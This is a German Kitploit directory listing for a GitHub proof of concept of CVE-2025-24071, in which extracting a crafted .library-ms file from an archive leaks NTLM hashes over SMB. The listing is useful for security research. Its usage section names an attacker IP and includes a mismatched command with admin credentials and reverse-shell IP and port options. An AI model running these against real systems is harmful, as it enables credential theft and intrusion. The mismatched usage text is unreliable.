Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-24071 — Proof-of-concept für CVE-2025-24071, das NTLM-Hash-Leck über eine manipulierte .library-ms-Datei in RAR/ZIP-Archiven demonstriert, das SMB-Authentifizierung beim Extrahieren auslöst. | Kitploit
Tools/GitHubGitHub/royall-researchers/cve-2025-24071
AufklärungPasswortangriffeSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffung
GitHubroyall-researchers/cve-2025-24071

CVE-2025-24071

Proof-of-concept für CVE-2025-24071, das NTLM-Hash-Leck über eine manipulierte .library-ms-Datei in RAR/ZIP-Archiven demonstriert, das SMB-Authentifizierung beim Extrahieren auslöst.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
2vor 1 JahrNoch nicht geprüft

CVE-2025-24071_PoC

CVE-2025-24071: NTLM-Hash-Leck durch RAR/ZIP-Extraktion und .library-ms-Datei

Windows Explorer initiiert automatisch eine SMB-Authentifizierungsanfrage, wenn eine .library-ms-Datei aus einem .rar-Archiv extrahiert wird, was zur Offenlegung des NTLM-Hashes führt. Der Benutzer muss die Datei nicht öffnen oder ausführen – bereits das Extrahieren reicht aus, um das Leck auszulösen.

Verwendung

root@kitploit:~

>>python poc.py

>>enter file name: your file name

>>enter IP: attacker IP
root@kitploit:~
>>python3 poc.py --url http://domainname.com --user admin --password password --reverse-ip 10.10.10.10 --reverse-port 8888

Update:

Update: Microsoft hat seine CVE-Nummer geändert. Die zuvor von Microsoft festgelegte CVE-Nummer CVE-2025-24071 wurde auf CVE-2025-24054 aktualisiert.🤷‍♂

Tool herunterladen